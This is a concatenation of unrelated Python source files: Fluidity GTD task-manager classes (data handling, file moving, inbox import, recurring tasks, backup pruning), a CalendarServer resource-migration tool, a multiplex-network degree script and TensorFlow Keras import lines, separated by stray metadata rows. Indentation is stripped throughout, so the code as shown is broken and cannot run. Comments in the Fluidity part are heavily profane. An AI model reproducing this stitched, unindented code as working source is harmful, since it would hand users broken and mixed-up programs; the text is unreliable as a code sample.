def activate_nas(self, nas, prj_key):
"""Move the given NextActions to the Project's next_actions list"""
project = self.prjs[prj_key]
self.__move_na(nas, project.next_actions,
(project.unordered_next_actions,
project.incubating_next_actions))
def add_na_to_prj(self, na, prj_key):
self.prjs[prj_key].next_actions.append(na)
def add_queued_singleton(self, na):
self.queued_singletons.append(na)
self.save_data()
def aof_names(self):
return [self.aofs[k]['name'] for k in self.aofs.keys()]
def archive_completed_singletons(self):
#FIXME: total crap. fix later.
# the .format("") below is on purpose - look at the path for
# defs.USER_DATA_PATH in your filesystem, it'll make more sense.
pkl_path = os.path.join(defs.USER_DATA_PATH,
defs.ARCHIVED_SINGLETONS_FNAME.format(""))
try:
with open(pkl_path, 'r') as pkl_read:
nas_to_archive = pickle.load(pkl_read)
now = datetime.datetime.now().strftime(
defs.ARCHIVED_SINGLETONS_TIME_TMPLT)
# back up the old data file, just in case...
backup_file_name = defs.ARCHIVED_SINGLETONS_FNAME.format(now)
shutil.copy2(pkl_path, os.path.join(defs.BACKUPS_PATH, backup_file_name))
except IOError:
nas_to_archive = []
singletons = self.prjs['singletons'].next_actions
for na in singletons:
if na.complete:
nas_to_archive.append(na)
for na in nas_to_archive:
if na in singletons:
singletons.remove(na)
with open(pkl_path, 'wb') as pkl_write:
pickle.dump(nas_to_archive, pkl_write, pickle.HIGHEST_PROTOCOL)
self.save_data()
def autosave(self):
# FIXME: ZOMG this is so ghetto-tastic. fix it. srsly.
self.save_data()
return True
def change_project_status(self, prj, new_status, queue_date=None):
self._file_toady.move_project_folder(prj.summary, prj.status, new_status)
prj_ = prj
note = ProjectNote(prj=prj_)
note.change_prj_status(new_status)
if new_status == "queued":
prj.queue_date = queue_date
prj.status = new_status
self.save_data()
def cleanup_before_exit(self):
self.save_data()
def copy_to_project_folder(self, file_name, prj):
self._file_toady.copy_to_project_folder(file_name, prj.summary, prj.status)
def create_new_aof(self, new_name):
key_name = app_utils.format_for_dict_key(new_name)
self.aofs[key_name] = {'name': new_name, 'projects': []}
self.rebuild_aof_cache()
self.save_data()
return self.aofs
def delete_na(self, na, prj):
prj.next_actions.remove(na)
self.save_data()
def delete_prj(self, prj):
app_utils.log_line("Deleting project: " + str(prj), datetime.datetime.now())
# trash the folders first
self._file_toady.trash_project_folder(prj.summary, prj.status)
# then ditch the project notes
prj_ = prj
ProjectNote(prj=prj_).delete()
#this is /almost certainly/ The Hard Way...
for a in self.aofs.keys():
matches = []
# Welcome to my entry in the "Obfuscated Python" contest!
for p in xrange(len(self.aofs[a]['projects'])):
if self.aofs[a]['projects'][p] == prj.key_name:
matches.append({'aof': a, 'p_index': p})
for i in matches:
del(self.aofs[i['aof']]['projects'][i['p_index']])
del(self.prjs[prj.key_name])
self.save_data()
def delete_stuff_note(self, note_obj):
DUHLETED = False
i = 0
while not DUHLETED and i < len(self.single_notes):
if self.single_notes[i]['summary'] == note_obj.summary:
del(self.single_notes[i])
DUHLETED = True
i += 1
def dump_processed_stuff_notes(self, stuff_list):
# cull out the InboxFile items - unneeded.
real_list = []
for stuff in stuff_list:
if not isinstance(stuff, inbox_items.InboxFile):
real_list.append(stuff)
processed_path = \
os.path.join(defs.USER_DATA_PATH,
defs.PROCESSED_STUFF_FILE_NAME + str(time.time()))
with open(processed_path, 'wb') as pfile:
pickle.dump(real_list, pfile, pickle.HIGHEST_PROTOCOL)
gf = gio.File(processed_path)
gf.trash()
def file_stuff_as_read_review(self, stuff, rr_path):
stuff_path = os.path.split(stuff.path)[1]
shutil.move(stuff.path, os.path.join(rr_path, stuff_path))
def get_contexts(self):
contexts = []
for pk in self.prjs.keys():
p = self.prjs[pk]
if p.status == "active":
for na in p.next_actions:
if na.context != "" and na.context != None:
if not na.context in contexts:
contexts.append(na.context)
contexts.sort()
return contexts
def get_file_list_for_prj(self, prj):
return self._file_toady.get_file_list_for_prj(prj.summary, prj.status)
def get_inbox_files(self):
hiddens = os.path.join(defs.INBOX_FOLDER, ".hidden")
if os.path.exists(hiddens):
with open(hiddens, 'r') as dot_hidden:
hidden = dot_hidden.read()
else:
hidden = ""
hidden += "\n".join(defs.IGNORED_INBOX_PATHS)
for file_ in os.listdir(defs.INBOX_FOLDER):
if file_ not in hidden and not file_.startswith('.'):
yield inbox_items.InboxFile(os.path.join(defs.INBOX_FOLDER,
file_))
def get_inbox_notes(self):
return self.single_notes
def get_current_nas_for_each_active_prj(self):
active_nas = []
for p in self.prjs.keys():
prj = self.prjs[p]
if prj.status == "active" and prj.summary != 'singletons':
for na in prj.next_actions:
if not na.complete:
active_nas.append(na)
break
active_nas.extend([na for na in prj.unordered_next_actions
if not na.complete])
for na in self.prjs['singletons'].next_actions:
if not na.complete:
active_nas.append(na)
return active_nas
def get_nas_for_prj(self, prj_key):
try:
return self.prjs[prj_key].next_actions
except AttributeError:
return []
def get_prj_aof_names(self, prj):
aof_list = []
if len(prj.aofs) == 0:
aof_list.append(defs.NO_AOF_ASSIGNED)
else:
for a in prj.aofs:
aof_list.append(self.aofs[a]['name'])
return sorted(aof_list)
def get_prjs_by_aof(self, area, review_filter):
prj_list = []
# "incomplete" is just used by Slider, so far"
if review_filter == "incomplete":
for p in sorted(self.prjs.keys()):
prj = self.prjs[p]
if prj.status != "completed":
prj_list.append(prj)
else:
if area == "All":
prj_list.extend([prj for prj in self.prjs.values() if prj.status == review_filter])
elif area == defs.NO_AOF_ASSIGNED:
for p in sorted(self.prjs.keys()):
prj = self.prjs[p]
if prj.status == review_filter and len(prj.aofs) == 0:
prj_list.append(prj)
else:
area_key = app_utils.format_for_dict_key(area)
if self.aofs[area_key]['projects']:
prj_keys = self.aofs[area_key]['projects']
prj_list.extend([prj for prj in self.prjs.values()
if prj.status == review_filter and prj.key_name in prj_keys])
return sorted(prj_list, key=operator.attrgetter('summary'))
def get_project_folder_uri(self, prj):
return self._file_toady.get_project_folder_uri(prj.summary, prj.status)
def incubate_nas(self, nas, prj_key):
"""Move the given NextActions to the Project's incubating_next_actions."""
project = self.prjs[prj_key]
self.__move_na(nas, project.incubating_next_actions,
(project.next_actions, project.unordered_next_actions))
def move_nas_to_ordered_actions(self, nas, prj_key):
project = self.prjs[prj_key]
self.__move_na(nas, project.next_actions,
(project.unordered_next_actions, project.incubating_next_actions))
def move_nas_to_unordered_actions(self, nas, prj_key):
project = self.prjs[prj_key]
self.__move_na(nas, project.unordered_next_actions,
(project.next_actions, project.incubating_next_actions))
def __move_na(self, nas, add_to, remove_from):
for na in nas:
add_to.append(na)
for na_list in remove_from:
try:
na_list.remove(na)
except ValueError:
# HACK to work around the fact that we don't know which
# list it's coming _from_.
pass
def queue_singleton_na(self, na, queue_date_str):
try:
self.prjs['singletons'].next_actions.remove(na)
na.queue_date = self._magic_maker.get_magic_date(queue_date_str)
self.add_queued_singleton(na)
except ValueError:
# don't freak out if someone tries queuing a NA that isn't in singletons
pass
def rebuild_aof_cache(self):
for aof in self.aofs:
del(self.aofs[aof]['projects'][:])
for prj in self.prjs.keys():
for aof_key in self.prjs[prj].aofs:
if prj not in self.aofs[aof_key]['projects']:
self.aofs[aof_key]['projects'].append(prj)
def remove_file_from_prj(self, file_name, prj):
self._file_toady.remove_from_project_folder(file_name, prj.summary,
prj.status)
def reparent_project(self, prj, new_parent):
"""Make `new_parent` the parent object of `prj`."""
new_parent.subprojects.append(prj.uuid)
prj.parent_project = new_parent.uuid
def save_data(self):
# utils.log_line("Saving main data file.", datetime.datetime.now())
backup_path = os.path.join(defs.BACKUPS_PATH,
defs.USER_DATA_MAIN_FNAME + str(time.time()))
shutil.copy(self.pickle_path, backup_path)
with open(self.pickle_path, 'wb') as pfile:
pickle.dump(self.top_data, pfile, pickle.HIGHEST_PROTOCOL)
return True
def search(self, query, include_completed=False, include_nas=False):
query = query.lower()
formatter = lambda x: "<b>{0}</b>".format(x) # pylint: disable-msg=W0108
results = []
for prj in self.prjs.values():
if include_nas and (include_completed or prj.status != 'completed'):
for na in prj.next_actions:
score = magic_machine.score(na.summary, query)
if score > 0.4:
# fuck me, this is ugly: "flat is better than nested."
summary_formatted = magic_machine.format_common_substrings(
na.summary, query, format_match=formatter)
results.append(
SearchResult(na.summary, summary_formatted,
prj.key_name, score, na.uuid))
if include_completed:
score = magic_machine.score(prj.summary, query)
if score > 0.4:
formatted = magic_machine.format_common_substrings(
prj.summary, query, format_match=formatter)
results.append(SearchResult(prj.summary, formatted,
prj.key_name, score))
else:
if prj.status != 'completed':
score = magic_machine.score(prj.summary, query)
if score > 0.4:
formatted = magic_machine.format_common_substrings(
prj.summary, query,
format_match=formatter)
results.append(SearchResult(prj.summary, formatted,
prj.key_name, score))
results.sort(key=operator.attrgetter('score'), reverse=True)
return results
def set_prj_aofs(self, prj, aof_text):
if aof_text == defs.NO_AOF_ASSIGNED:
del(prj.aofs[:])
else:
for aof in self._parse_aof_text(aof_text):
del(prj.aofs[:])
if prj.key_name not in self.aofs[aof]['projects']:
self.aofs[aof]['projects'].append(prj.key_name)
prj.aofs.append(aof)
self.save_data()
return self.get_prj_aof_names(prj)
def add_slider_items(self, na_list, note_list, queued_list, note_strings):
self._take_these_fucking_nas(na_list)
self._take_these_fucking_notes(note_list)
self._take_these_fucking_queues(queued_list)
for note_str in note_strings:
note = {'summary': note_str, 'details': ""}
self.single_notes.append(note)
# Confirm that we made it to the step of saving
return self.save_data()
def _take_these_fucking_nas(self, na_list):
na_objs = [self._ploader(na_file) for na_file in na_list]
for na in na_objs:
self.prjs[na['prj_key']].next_actions.append(na['na_obj'])
def _take_these_fucking_notes(self, note_list):
note_objs = []
for note in note_list:
note_objs.append(self._ploader(note))
for notey in note_objs:
self.single_notes.append(notey)
def _take_these_fucking_queues(self, queued_list):
q_objs = []
for q_file in queued_list:
q_objs.append(self._ploader(q_file))
for obj in q_objs:
self.queued_singletons.append(obj['na_obj'])
self.activate_due_queued()
def _parse_aof_text(self, atext):
if atext == '':
return [app_utils.format_for_dict_key(defs.NO_AOF_ASSIGNED)]
else:
return [app_utils.format_for_dict_key(atext)]
def _ploader(self, pfile_path):
with open(pfile_path, 'r') as pfile:
pcontent = pickle.load(pfile)
return pcontent
# PROPERTIES
def engage_na_deleter(self, uuid):
"""Find the NA with the UID of uid arg, and delete it."""
for prj in self.prjs.values():
# only look at active projects, since this is for Engage
if prj.status == "active":
for na in prj.next_actions:
if na.uuid == uuid:
prj.next_actions.remove(na)
return True
# uh-oh. we REALLY shouldn't have gotten here.
# FIXME: this ought to throw an exception, really
return False
class FileSystemManager(object):
"""Filesystem manager for Fluidity"""
def __init__(self):
pass
def copy_to_project_folder(self, fname, prj_summary, prj_status):
full_path = self._get_path_for_type(prj_status) + \
self._sanitize_path(prj_summary)
# Does the project folder exist yet? If not, create it. If that fails,
# return False right away.
if not os.path.exists(full_path):
# try creating the right folder. if it fails, return False
if not self._create_project_folder(full_path):
return False
if fname.startswith('/'):
base_name = os.path.split(fname)[1]
else:
base_name = fname
# We got this far; now we can try the copy or move operation - which
# path will need to depend on if fname is a folder or not
if os.path.isdir(fname):
if fname.startswith(defs.INBOX_FOLDER):
shutil.move(fname, os.path.join(full_path, base_name))
else:
shutil.copytree(fname, os.path.join(full_path, base_name))
else:
if fname.startswith(defs.INBOX_FOLDER):
# more Evil(TM)... to be fixed with the signals rewrite
try:
shutil.move(fname, os.path.join(full_path, base_name))
except IOError:
# this might have "completed processing" already,
# so maybe it's in the trash...
base_name = os.path.split(fname)[1]
trash_path = BaseDirectory.xdg_data_home + "/Trash/files"
fname = os.path.join(trash_path, base_name)
shutil.move(fname, os.path.join(full_path, base_name))
else:
shutil.copy(fname, os.path.join(full_path, base_name))
return True
def move_project_folder(self, prj_summary, old_status, new_status):
sanitized_summary = self._sanitize_path(prj_summary)
full_path = self._get_path_for_type(old_status) + sanitized_summary
new_path = self._get_path_for_type(new_status) + sanitized_summary
if os.path.exists(full_path):
if full_path != new_path:
shutil.move(full_path, new_path)
def remove_from_project_folder(self, fname, prj_summary, prj_status):
full_path = os.path.join(self._get_path_for_type(prj_status),
self._sanitize_path(prj_summary), fname)
gf = gio.File(full_path)
gf.trash()
gf = None
del(gf)
def get_project_folder_uri(self, prj_summary, prj_status, create=True):
# this method assumes that if you're asking for the URI, you must want
# there to be a prj folder, so if there isn't one yet, just make one.
# However, if you don't want that, just set 'create' to False
full_path = self._get_path_for_type(prj_status) + \
self._sanitize_path(prj_summary)
if create:
if not os.path.exists(full_path):
# try creating the right folder. if it fails, return False
if not self._create_project_folder(full_path):
return ""
uri = "file://" + full_path
return uri
def get_file_list_for_prj(self, prj_summary, prj_status):
path = self.get_project_folder_uri(prj_summary, prj_status, create=False)
path = path.replace("file://", '')
path += os.sep
if os.path.exists(path):
return [path + f for f in os.listdir(path)]
else:
return []
def trash_project_folder(self, prj_summary, prj_status):
full_path = self._get_path_for_type(prj_status) + \
self._sanitize_path(prj_summary)
if os.path.exists(full_path):
gf = gio.File(full_path)
gf.trash()
gf = None
del(gf)
def _create_project_folder(self, path):
os.mkdir(path)
if os.path.exists(path):
return True
else:
return False
def _sanitize_path(self, fname):
# I might want to extend this behavior later, which is why I made a custom
# method instead of just doing the raw replacement below each time
return fname.replace('/', '-')
def _get_path_for_type(self, prj_status):
if prj_status == "active":
return defs.ACTIVE_FOLDER + os.sep
elif prj_status == "queued":
return defs.QUEUED_FOLDER + os.sep
elif prj_status == "waiting_for":
return defs.WAITING_FOR_FOLDER + os.sep
elif prj_status == 'incubating':
return defs.INCUBATING_FOLDER + os.sep
elif prj_status == 'completed':
return defs.COMPLETED_FOLDER + os.sep
class InboxManager(object):
# CHOCK FULL OF PROFANITY! I'm a juvenile, easily frustrated asshole.
# Get used to it.
def __init__(self, caller, obj_tree, fucdkingdatamanager):
# I also write shitty code, get used to that, too.
self._caller = caller
self._tree = obj_tree
self._fsm = FileSystemManager()
self.dm = fucdkingdatamanager
col = [Column('summary', data_type=str, searchable=True,
ellipsize=pango.ELLIPSIZE_END, expand=True),]
self._tree.set_columns(col)
self._fill_rows()
self._tree.set_headers_visible(False)
# automagically import new Slider items
inbox_monitor = gio.File(defs.NOTE_SLIDER_FOLDER).monitor_directory()
inbox_monitor.connect('changed', self.process_slider_inbox_changes)
def _fill_rows(self):
# FIXME: fix this FFS, use some actual polymorphism
#FIXME: reenable these later
self._row_inbox_folder = CategoryRow("Inbox Folder")
# self._row_email_inbox = CategoryRow("Emails")
# i.e.: Tomboy, e-d-s inbox "tasks", & collected items from Slider
self._row_single_notes = CategoryRow("Single notes")
self._row_processed_stuff = CategoryRow("Processed Stuff")
#FIXME: and re-enable these , too.
self._tree.append(None, self._row_inbox_folder)
# self._tree.append(None, self._row_email_inbox)
self._tree.append(None, self._row_single_notes)
self._tree.append(None, self._row_processed_stuff)
def add_actual_shit_to_columns(self):
notes = self.dm.get_inbox_notes()
notes.sort(key=operator.itemgetter('summary'))
# FIXME: this clears everything in "Processed Stuff", and it probably
# shouldn't - that should live in its own method.
self._tree.clear()
self._fill_rows()
for note in notes:
self._tree.append(self._row_single_notes,
inbox_items.InboxNote(note['summary'], note['details']))
for file_ in sorted(self.dm.get_inbox_files(),
key=operator.attrgetter('summary')):
self._tree.append(self._row_inbox_folder, file_)
# def add_inbox_files_to_clarify(self):
# note, file_, files = None, None, None
# for file_ in files:
# self._tree.append(self._row_single_notes,
# inbox_items.InboxNote(note['summary'], note['details']))
def complete_processing(self, obj):
# FIXME: wtf is this doing in here? this is GUI shit!
if isinstance(obj, inbox_items.InboxStuff):
selected_row = self._tree.get_selected_row_number()
self._tree.remove(obj)
self._tree.append(self._row_processed_stuff, obj)
if isinstance(obj, inbox_items.InboxNote):
self.dm.delete_stuff_note(obj)
elif isinstance(obj, inbox_items.InboxFile):
try:
obj.trash()
except gio.Error as error:
msg = ("Can't trash file (called from InboxManager."
"complete_processing): {0} -- error: {1}")
app_utils.log_line(msg.format(obj.summary, error))
self._tree.refresh()
self._tree.select_paths((selected_row, 0))
gobject.idle_add(self._tree.grab_focus)
def gather_slider_items(self):
na_list = []
note_list = []
queued_list = []
filenames = [os.path.join(defs.NOTE_SLIDER_FOLDER, f)
for f in os.listdir(defs.NOTE_SLIDER_FOLDER)
if f.endswith('.pkl')]
for n in filenames:
if n.endswith('-note.pkl'):
note_list.append(n)
elif n.endswith('-na.pkl'):
na_list.append(n)
elif n.endswith("-queued_na.pkl"):
queued_list.append(n)
gtasks_note_strings = self._import_google_tasks_inbox()
# only delete the actual files if we got confirmation that
# the data from them was saved successfully
if self.dm.add_slider_items(na_list, note_list, queued_list, gtasks_note_strings):
for f in note_list + na_list + queued_list:
gio.File(f).trash()
def _import_google_tasks_inbox(self):
# Yep, hardcoded paths specific to my machine. This is all temporary throwaway code now, so IDGAF
gtasks_raw_output = subprocess.check_output(["python3", "/home/jensck/Code/TasksSample/tasks_test.py"])
notes_list = json.loads(gtasks_raw_output)
return notes_list
def process_slider_inbox_changes(self, gfile_mon, gfile, other_file, event): # IGNORE:W0613
if event.value_nick == 'changes-done-hint':
self.gather_slider_items()
self.add_actual_shit_to_columns()
class RecurrenceManager(object):
def __init__(self, dm):
self._data_lumbergh = dm
def place_recurring_tasks(self):
app_utils.log_line("Running place_recurring_tasks()", datetime.datetime.now())
self._load_data(defs.RECURRENCE_DATA)
data = self._recur_data
today = datetime.date.today()
if self._recur_data['last_run'] < today:
self._place_daily_tasks(today, data)
self._place_monthly_tasks(today, data)
self._place_weekly_tasks(today, data)
self._recur_data['last_run'] = today
self._save_data(defs.RECURRENCE_DATA)
def _create_na(self, task):
na = gee_tee_dee.NextAction(task['summary'])
na_attrs = ('priority', 'context', 'notes', 'url', 'time_est',
'energy_est')
for attr in na_attrs:
if attr in task:
na.__setattr__(attr, task[attr])
if 'due_date' in task:
na.due_date = datetime.date.today() + \
datetime.timedelta(task['due_date'])
return na
# everyXDays: 1 # integer
#- summary: # the task's description in e-d-s
# priority: # "gnite syntax": ! and + are high, - is low, blank is normal
# context: # String, enclosed in quotes
# notes: # probably ought to be a block I guess. until then, string.
# url: # url, enclosed in quotes
# due_date: # integer - X days after placement
def _load_data(self, data_file_path):
self._recur_data = None
self._recur_data = self._yloader(data_file_path)
# FIXME: datamanager is a fucking mess. clean it up.
self._singleton_nas = self._data_lumbergh.get_nas_for_prj('singletons')
def _place_daily_tasks(self, today, data):
for t in data['daily']:
if 'last_seen' not in t:
na = self._create_na(t)
self._data_lumbergh.add_na_to_prj(na, 'singletons')
t['last_seen'] = today
else:
delta = datetime.timedelta(t['everyXDays'])
found = False
index = 0
while found == False and index < len(self._singleton_nas):
if self._singleton_nas[index].summary == t['summary']:
if not self._singleton_nas[index].complete:
found = True
t['last_seen'] = today
index += 1
if found == False and today >= t['last_seen'] + delta:
na = self._create_na(t)
self._data_lumbergh.add_na_to_prj(na, 'singletons')
t['last_seen'] = today
def _place_monthly_tasks(self, today, data):
last = data['last_run']
for t in data['monthly']:
for day in t['days']:
# FIXME: make more generic wrt weekly tasks, too.
task_date = datetime.date(today.year, today.month, day)
if last < task_date <= today:
found = False
index = 0
while found == False and index < len(self._singleton_nas):
if self._singleton_nas[index].summary == t['summary']:
if not self._singleton_nas[index].complete:
found = True
index += 1
if found == False:
na = self._create_na(t)
self._data_lumbergh.add_na_to_prj(na, 'singletons')
def _place_weekly_tasks(self, today, data):
for t in data['weekly']:
for day in t['weekdays']:
# FIXME: make more generic wrt weekly tasks, too.
if day == today.weekday():
# FIXME: bah, I suck. make this work properly when we haven't run
# on a given day, make it run everything since the last time we ran.
# the following should help I guess...
# (today + datetime.timedelta(7 - (today - last_day).days)).weekday()
found = False
index = 0
while found == False and index < len(self._singleton_nas):
if self._singleton_nas[index].summary == t['summary']:
if not self._singleton_nas[index].complete:
found = True
index += 1
if found == False:
na = self._create_na(t)
self._data_lumbergh.add_na_to_prj(na, 'singletons')
def _save_data(self, data_file_path):
#FIXME: create a backup copy?
with open(data_file_path, 'w') as yfile:
print("Saving recurrence data")
yaml.dump(self._recur_data, yfile, Dumper=defs.YAML_DUMPER,
default_flow_style=False)
def _yloader(self, yfile_path):
with open(yfile_path, 'r') as yfile:
print("calling yaml.load()")
ycontent = yaml.load(yfile, Loader=defs.YAML_LOADER)
return ycontent
class BackupJesus(object):
"""BackupJesus saaaaaaaaaaaves the righteous among thy backup files from the
fiery damnation of the void which is /dev/null!
(Actually, /dev/null has nothing to do with this code actually, I just
use gio.File.delete(), but that wouldn't be as funny. ;P)
"""
BACKUPS_PATH = defs.BACKUPS_PATH
FITY_EPOCH = defs.FITY_EPOCH
def __init__(self):
self.now = datetime.datetime.now()
# I'm lazy.
delta = datetime.timedelta
self.backup_policies = (# First four hours of *all* backups
{'start_time': self.now - delta(hours=4),
'end_time': self.now,
'interval': delta(0)},
# every hour of the past week
{'start_time': self.now - delta(weeks=1),
'end_time': self.now - delta(hours=4),
'interval': delta(hours=1)},
# every day of the past month
{'start_time': self.now - delta(weeks=4),
'end_time': self.now - delta(weeks=1),
'interval': delta(1)},
# every month since Fluidity's "epoch"
{'start_time': datetime.datetime.fromtimestamp(
defs.FITY_EPOCH),
'end_time': self.now - delta(weeks=4),
'interval': delta(weeks=4)})
def kill_stale_backups(self, dry_run=False):
pattern = os.path.join(defs.BACKUPS_PATH, 'fluidity*.pkl*')
kill_list = sorted(glob.glob(pattern))
the_book_of_life = []
for policy in self.backup_policies:
the_book_of_life += self._find_saved_indexes(kill_list, **policy)
the_book_of_life.sort()
doomed = self._delete_doomed_files(kill_list, the_book_of_life, dry_run)
elderly = [d for d in sorted(doomed) if self._is_senior_citizen(d)]
message = "Damned {0} backups to the void; {1} were senior citizens."
app_utils.log_line(message.format(len(doomed), len(elderly)),
datetime.datetime.now())
def _delete_doomed_files(self, klist, saved_indexes, keep_the_safety_on):
doomed = []
for idx, victim in enumerate(klist):
if idx not in saved_indexes:
doomed.append(self._get_creation_time(victim))
if not keep_the_safety_on:
gfile = gio.File(victim)
gfile.trash()
return doomed
def _find_saved_indexes(self, klist, start_time, end_time, interval):
saved = []
for idx, backup_file in enumerate(klist):
creation_time = self._get_creation_time(backup_file)
if start_time < creation_time < end_time:
saved.append(idx)
start_time = creation_time + interval
return saved
def _get_creation_time(self, path):
file_name = path.replace(defs.BACKUPS_PATH + '/', '')
time_float = float(file_name.replace('fluidity.pkl', ''))
return datetime.datetime.fromtimestamp(time_float)
def _is_senior_citizen(self, dt):
return dt < datetime.datetime.now() - datetime.timedelta(weeks=9)
class CategoryRow(object):
def __init__(self, summary):
self.summary = summary
class SearchResult(object):
"""Simple "row" class for use with Kiwi's ObjectList"""
def __init__(self, summary, summary_formatted, prj_key, score, na_uuid=None):
"""Initialize this SearchResult.
Args:
summary: a plain-text string of the result content
summary_formatted: a string formatted with pango markup
prj_key: ...I can't even remember what this does anymore. FML.
score: the 'score' returned by the relevance module
na_uuid: if this is a NextAction, give its uuid so we can jump to it;
defaults to None
"""
self.summary = summary
self.prj_key = prj_key
self.score = score
self.summary_formatted = summary_formatted
self.na_uuid = na_uuid
if self.na_uuid:
self.result_type = "na"
self.result_type_formatted = "<i>Next Action</i>"
else:
self.result_type = "prj"
self.result_type_formatted = "<i>Project</i>"
| gpl-3.0 | -1,707,985,159,558,534,700 | 40.826754 | 111 | 0.554055 | false |
macosforge/ccs-calendarserver | calendarserver/tools/resources.py | 1 | 4349 | #!/usr/bin/env python
##
# Copyright (c) 2006-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from __future__ import print_function
__all__ = [
"migrateResources",
]
from getopt import getopt, GetoptError
import os
import sys
from calendarserver.tools.cmdline import utilityMain, WorkerService
from twext.python.log import Logger
from twisted.internet.defer import inlineCallbacks, returnValue
from txdav.who.directory import CalendarDirectoryRecordMixin
from twext.who.directory import DirectoryRecord as BaseDirectoryRecord
from txdav.who.idirectory import RecordType
log = Logger()
class ResourceMigrationService(WorkerService):
@inlineCallbacks
def doWork(self):
try:
from txdav.who.opendirectory import (
DirectoryService as OpenDirectoryService
)
except ImportError:
returnValue(None)
sourceService = OpenDirectoryService()
sourceService.recordType = RecordType
destService = self.store.directoryService()
yield migrateResources(sourceService, destService)
def usage():
name = os.path.basename(sys.argv[0])
print("usage: %s [options] " % (name,))
print("")
print(" Migrates resources and locations from OD to Calendar Server")
print("")
print("options:")
print(" -h --help: print this help and exit")
print(" -f --config <path>: Specify caldavd.plist configuration path")
print(" -v --verbose: print debugging information")
print("")
sys.exit(0)
def main():
try:
(optargs, _ignore_args) = getopt(
sys.argv[1:], "hf:", [
"help",
"config=",
],
)
except GetoptError, e:
usage(e)
#
# Get configuration
#
configFileName = None
verbose = False
for opt, arg in optargs:
if opt in ("-h", "--help"):
usage()
elif opt in ("-f", "--config"):
configFileName = arg
else:
raise NotImplementedError(opt)
utilityMain(configFileName, ResourceMigrationService, verbose=verbose)
class DirectoryRecord(BaseDirectoryRecord, CalendarDirectoryRecordMixin):
pass
@inlineCallbacks
def migrateResources(sourceService, destService, verbose=False):
"""
Fetch all the locations and resources from sourceService that are not
already in destService and copy them into destService.
"""
destRecords = []
for recordType in (
RecordType.resource,
RecordType.location,
):
records = yield sourceService.recordsWithRecordType(recordType)
for sourceRecord in records:
destRecord = yield destService.recordWithUID(sourceRecord.uid)
if destRecord is None:
if verbose:
print(
"Migrating {recordType} {uid}".format(
recordType=recordType.name,
uid=sourceRecord.uid
)
)
fields = sourceRecord.fields.copy()
fields[destService.fieldName.recordType] = destService.recordType.lookupByName(recordType.name)
# Only interested in these fields:
fn = destService.fieldName
interestingFields = [
fn.recordType, fn.shortNames, fn.uid, fn.fullNames, fn.guid
]
for key in fields.keys():
if key not in interestingFields:
del fields[key]
destRecord = DirectoryRecord(destService, fields)
destRecords.append(destRecord)
if destRecords:
yield destService.updateRecords(destRecords, create=True)
if __name__ == "__main__":
main()
| apache-2.0 | -4,358,202,407,898,562,000 | 27.801325 | 111 | 0.626811 | false |
KatolaZ/mammult | structure/activity/node_degree_vectors.py | 1 | 2498 | # This file is part of MAMMULT: Metrics And Models for Multilayer Networks
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
####
##
## Take as input the layers of a multiplex, and provide as output a
## file where the n-th line contains the degrees of the n-th node at
## each layer, separated by a space, in the format:
##
## node1_deglay1 node1_deglay2 .... node1_deglayM
## node2_deglay1 node2_deglay2 .... node2_deglayM
## ..............................................
## nodeN_deglay1 nodeN_deglay2 .... nodeN_deglayM
##
##
import sys
if len(sys.argv) < 2:
print "Usage: %s <layer1> [<layer2>...]" % sys.argv[0]
sys.exit(1)
node_degrees = {}
max_N = -1
num_layer = 0
for layer in sys.argv[1:]:
with open(layer, "r") as lines:
for l in lines:
if l[0] == "#":
continue
s, d = [int(x) for x in l.strip(" \n").split(" ")[:2]]
if s > max_N:
max_N = s
if d > max_N:
max_N = d
if s in node_degrees:
if num_layer in node_degrees[s]:
node_degrees[s][num_layer] += 1
else:
node_degrees[s][num_layer] = 1
else:
node_degrees[s] = {}
node_degrees[s][num_layer] = 1
if d in node_degrees:
if num_layer in node_degrees[d]:
node_degrees[d][num_layer] += 1
else:
node_degrees[d][num_layer] = 1
else:
node_degrees[d] = {}
node_degrees[d][num_layer] = 1
num_layer += 1
for n in range(max_N+1):
for i in range(num_layer):
if n in node_degrees:
if i in node_degrees[n]:
print node_degrees[n][i],
else:
print 0,
else:
print 0,
print
| gpl-3.0 | 6,631,259,597,424,604,000 | 29.463415 | 74 | 0.542834 | false |
petewarden/tensorflow | tensorflow/python/keras/engine/data_adapter.py | 1 | 57975 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adapter module that convert different input data objects into tf.dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import contextlib
import functools
import itertools
import math
import random
import numpy as np
import six
from tensorflow.python.data.experimental.ops import cardinality
from tensorflow.python.data.experimental.ops import distribute_options
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.distribute import distribution_strategy_context as ds_context
from tensorflow.python.distribute import input_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import smart_cond
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras import backend
from tensorflow.python.keras.engine import training_utils
from tensorflow.python.keras.utils import data_utils
from tensorflow.python.keras.utils import dataset_creator
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
